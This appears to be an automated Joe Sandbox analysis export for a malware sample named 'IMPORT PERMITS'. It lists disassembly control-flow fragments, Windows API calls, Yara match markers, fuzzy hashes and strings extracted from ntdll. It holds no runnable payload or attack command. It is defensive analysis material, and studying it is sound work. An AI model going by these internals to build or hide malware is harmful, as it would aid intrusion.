                                                                                                                                Signature Coverage:9.4%
                                                                                                                                Total number of Nodes:139
                                                                                                                                Total number of Limit Nodes:9

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417585
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                APIs
                                                                                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C37A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Close
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 6276$6276I39$6276I39$I39
                                                                                                                                • API String ID: 0-1925500867

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 53 413d62-413d7f 54 413d81-413d8c 53->54 55 413d39-413d46 53->55 56 413de0-413e3d call 42e4c3 call 42eed3 call 417513 call 404833 call 424bb3 54->56 57 413d8e-413dbb 54->57 58 413d48-413d5d 55->58 59 413dbc 55->59 72 413e5d-413e63 56->72 73 413e3f-413e4e PostThreadMessageW 56->73 57->59 61 413dd5-413dde 58->61 62 413d5f-413d60 58->62 59->61 61->56 73->72 74 413e50-413e5a 73->74 74->72
                                                                                                                                APIs
                                                                                                                                • PostThreadMessageW.USER32(36373236,00000111,00000000,00000000), ref: 00413E4A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePostThread
                                                                                                                                • String ID: 6276$6276I39$6276I39$I39
                                                                                                                                • API String ID: 1836367815-1925500867

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • PostThreadMessageW.USER32(36373236,00000111,00000000,00000000), ref: 00413E4A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePostThread
                                                                                                                                • String ID: 6276$6276I39$6276I39$I39
                                                                                                                                • API String ID: 1836367815-1925500867

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 345 4175b8-4175bf 346 4175c0-4175c6 345->346 347 4175c7-4175ca 346->347 348 4175cb-4175ce 347->348 349 4175fa 347->349 350 4175cf-4175df 348->350 351 4175fc-417617 349->351 352 41758f-41759d call 42dac3 349->352 356 4175eb-4175f6 350->356 351->346 354 417619-417622 351->354 366 417573-417587 LdrLoadDll 352->366 367 41758a-41758d 352->367 357 417624-417632 354->357 358 41764b-41766d 354->358 356->350 362 4175f8-4175f9 356->362 357->356 359 417634-417636 357->359 360 41766e-417671 358->360 359->360 363 417638 359->363 362->349 363->347 365 41763a-417649 363->365 365->358 368 417672-41767e 365->368 366->367 370 417680-417683 368->370 371 417684-41769b call 42f063 368->371 374 41769d-4176ce call 42f063 call 42b2f3 371->374 375 4176cf-4176ef call 42b2f3 371->375
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 382 417506-41750d 383 417547-417558 call 42f8a3 382->383 384 41750f-41753c call 42f003 382->384 388 41755d 383->388 389 417542-417550 call 42f603 384->389 390 41753e-417541 384->390 391 417560-417571 call 42dac3 388->391 389->391 398 417552-417557 389->398 396 417573-417587 LdrLoadDll 391->396 397 41758a-41758d 391->397 396->397 398->388 399 417558 call 42f8a3 398->399 399->388
                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417585
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 415 41758f-41759d call 42dac3 420 417573-417587 LdrLoadDll 415->420 421 41758a-41758d 415->421 420->421
                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417585
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                • Opcode ID: faa19c80f4feba2061a74ca3ae79c91efa0461eacaa1439af41494dbf367e914
                                                                                                                                • Instruction ID: ede1850716ebb422ed3c2535a29876ab67790654861e795397d75b07a85b4bc4
                                                                                                                                • Opcode Fuzzy Hash: faa19c80f4feba2061a74ca3ae79c91efa0461eacaa1439af41494dbf367e914
                                                                                                                                • Instruction Fuzzy Hash: 31F0A0B5E0410DBBDB00CA95DC41FEEBB78EF45318F1082A9E90896200E3359A168B91

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 422 417593-41759d call 42dac3 427 417573-417587 LdrLoadDll 422->427 428 41758a-41758d 422->428 427->428
                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417585
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                • Opcode ID: af889453b085852eccb278b9c7a2561df7d0aadd69b1b6e10842e4ddd5654ea4
                                                                                                                                • Instruction ID: bbefeecb9fbd67132910372d0dc99fec3dc364757f9caa88d0980819f192cd57
                                                                                                                                • Opcode Fuzzy Hash: af889453b085852eccb278b9c7a2561df7d0aadd69b1b6e10842e4ddd5654ea4
                                                                                                                                • Instruction Fuzzy Hash: 5FF030B5D0410DBBDB00DA99DC42FABB7B8DB45208F108195F90896240F634EA558BD5
                                                                                                                                APIs
                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8BFC4589,00000007,00000000,00000004,00000000,00416DF9,000000F4), ref: 0042C712
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                • Opcode ID: f704647b0a7c45a6b5859f8aa2176ba2dd169f799a595d2c976edf9410cb87cf
                                                                                                                                • Instruction ID: f5cc48ef50bcaa2af9ee5250c1fd3c21de1d36627e9c3385dc6ab60d9e539dbf
                                                                                                                                • Opcode Fuzzy Hash: f704647b0a7c45a6b5859f8aa2176ba2dd169f799a595d2c976edf9410cb87cf
                                                                                                                                • Instruction Fuzzy Hash: 47E06DB2600208BBDA10EE59DC41EAB37ACDFC5714F004419F908A7242C670B9118AB8

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 429 42c683-42c6c7 call 4048c3 call 42d5c3 RtlAllocateHeap
                                                                                                                                APIs
                                                                                                                                • RtlAllocateHeap.NTDLL(?,0041E2E4,?,?,00000000,?,0041E2E4,?,?,?), ref: 0042C6C2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                • Opcode ID: 91884bb2f0ac8af9a4aa6ea0de853ea0b7eac79e40581915d80249b308c900df
                                                                                                                                • Instruction ID: 26b6d175563219739d72d54b8956cc6bc6576853ca31bdfc4a179138117d8d4e
                                                                                                                                • Opcode Fuzzy Hash: 91884bb2f0ac8af9a4aa6ea0de853ea0b7eac79e40581915d80249b308c900df
                                                                                                                                • Instruction Fuzzy Hash: E0E06DB66003087BD610EE5ADC45E9B37ACEFC5714F004419FA08A7241D670B9118BB8
                                                                                                                                APIs
                                                                                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,E39CA3BE,?,?,E39CA3BE), ref: 0042C75A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_400000_IMPORT PERMITS.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ExitProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 621844428-0
                                                                                                                                • Opcode ID: 2acd5a490768c9832618ef1d028958695b71c0fca5973a16c1d19e88c75f900a
                                                                                                                                • Instruction ID: 907eb8c69ca37f2eb879960a4b276426f7e41c6fb7599df7476c68977caa0473
                                                                                                                                • Opcode Fuzzy Hash: 2acd5a490768c9832618ef1d028958695b71c0fca5973a16c1d19e88c75f900a
                                                                                                                                • Instruction Fuzzy Hash: 3EE08636210618BBD610FB6ADC11F97775CDFC5714F404429FA0867242C6B4BA118BF4
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 244ceb41d760cfecd9cf04005f88ad64321317489b22aa31ed4d3a9d0c189b69
                                                                                                                                • Instruction ID: 81534222751e34b2d4763277e5f85b8a3a0cedf6141eb2e07a15a73a542339be
                                                                                                                                • Opcode Fuzzy Hash: 244ceb41d760cfecd9cf04005f88ad64321317489b22aa31ed4d3a9d0c189b69
                                                                                                                                • Instruction Fuzzy Hash: 76B09B719015D5C5DA11F7644608B17791077D0701F55C163E3034753F4778C1D1F275
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-2160512332
                                                                                                                                • Opcode ID: 190219bc3a91ebad2a31e067d88fea31c1ee49e5ae9feed9210c64bcbdba344a
                                                                                                                                • Instruction ID: 58e4187218a43c17be614cb6dfeeea30f44483db6b213f140d1cb1b7131ce367
                                                                                                                                • Opcode Fuzzy Hash: 190219bc3a91ebad2a31e067d88fea31c1ee49e5ae9feed9210c64bcbdba344a
                                                                                                                                • Instruction Fuzzy Hash: 4E926C71604342ABE721DF19C880F6BBBE8BB94758F04492EFA9497361D7B0E845CB53
                                                                                                                                Strings
                                                                                                                                • 8, xrefs: 014552E3
                                                                                                                                • Invalid debug info address of this critical section, xrefs: 014554B6
                                                                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01455543
                                                                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0145540A, 01455496, 01455519
                                                                                                                                • Critical section address., xrefs: 01455502
                                                                                                                                • Critical section address, xrefs: 01455425, 014554BC, 01455534
                                                                                                                                • undeleted critical section in freed memory, xrefs: 0145542B
                                                                                                                                • Critical section debug info address, xrefs: 0145541F, 0145552E
                                                                                                                                • Thread identifier, xrefs: 0145553A
                                                                                                                                • corrupted critical section, xrefs: 014554C2
                                                                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014554E2
                                                                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014554CE
                                                                                                                                • double initialized or corrupted critical section, xrefs: 01455508
                                                                                                                                • Address of the debug info found in the active list., xrefs: 014554AE, 014554FA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                • API String ID: 0-2368682639
                                                                                                                                • Opcode ID: da6a48afc59ccdc8e9fc3779d67978c4d9574f344743af50f313b612091f6e67
                                                                                                                                • Instruction ID: e0c9d8dbba7038f4d17e5e0f9b6dc3bceae00e824c05eb7f7846b1896df60199
                                                                                                                                • Opcode Fuzzy Hash: da6a48afc59ccdc8e9fc3779d67978c4d9574f344743af50f313b612091f6e67
                                                                                                                                • Instruction Fuzzy Hash: 5181AFB1A41359EFDB60CF99C844BAEBBB5BB08B18F10415EF908BB361D375A941CB50
                                                                                                                                Strings
                                                                                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01452506
                                                                                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014525EB
                                                                                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01452412
                                                                                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0145261F
                                                                                                                                • @, xrefs: 0145259B
                                                                                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01452624
                                                                                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01452409
                                                                                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014524C0
                                                                                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014522E4
                                                                                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01452602
                                                                                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01452498
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                • API String ID: 0-4009184096
                                                                                                                                • Opcode ID: 72db42c61604017a6c4812ee22af042e00309ddeede0fc0fd3f8ecf8e2496d3a
                                                                                                                                • Instruction ID: 3a0ea6c359e2ceff1197b930ca7c777fb36866527d188f90df639f81dde1f8f4
                                                                                                                                • Opcode Fuzzy Hash: 72db42c61604017a6c4812ee22af042e00309ddeede0fc0fd3f8ecf8e2496d3a
                                                                                                                                • Instruction Fuzzy Hash: C40282B1D002299BDB61DB55CC80F9AB7B8AB54304F0041EBEB09A7252E7B09F85CF59
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                Strings
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                Strings
                                                                                                                                • HandleTraces, xrefs: 01468C8F
                                                                                                                                • VerifierDebug, xrefs: 01468CA5
                                                                                                                                • VerifierDlls, xrefs: 01468CBD
                                                                                                                                • x,, xrefs: 01468A35, 01468A5F
                                                                                                                                • VerifierFlags, xrefs: 01468C50
                                                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01468A67
                                                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01468A3D
                                                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 01468B8F
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags$x,
                                                                                                                                Strings
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c$x,
                                                                                                                                Strings
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c$x,
                                                                                                                                Strings
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                Strings
                                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0145219F
                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01452178
                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 01452165
                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01452180
                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014521BF
                                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 01452160, 0145219A, 014521BA
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                Strings
                                                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 01458170
                                                                                                                                • LdrpInitializeImportRedirection, xrefs: 01458177, 014581EB
                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01458181, 014581F5
                                                                                                                                • LdrpInitializeProcess, xrefs: 0141C6C4
                                                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 014581E5
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0141C6C3
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 01422DF0: LdrInitializeThunk.NTDLL ref: 01422DFA
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01420BA3
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01420BB6
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01420D60
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01420D74
                                                                                                                                Similarity
                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                Strings
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: +$ +$Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                Strings
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                Strings
                                                                                                                                • @, xrefs: 01418591
                                                                                                                                • LdrpInitializeProcess, xrefs: 01418422
                                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0141855E
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01418421
                                                                                                                                Strings
                                                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014521D9, 014522B1
                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 014521DE
                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014522B6
                                                                                                                                • .Local, xrefs: 014128D8
                                                                                                                                Strings
                                                                                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01453437
                                                                                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0145342A
                                                                                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01453456
                                                                                                                                • RtlDeactivateActivationContext, xrefs: 01453425, 01453432, 01453451
                                                                                                                                Strings
                                                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01440FE5
                                                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014410AE
                                                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0144106B
                                                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01441028
                                                                                                                                Strings
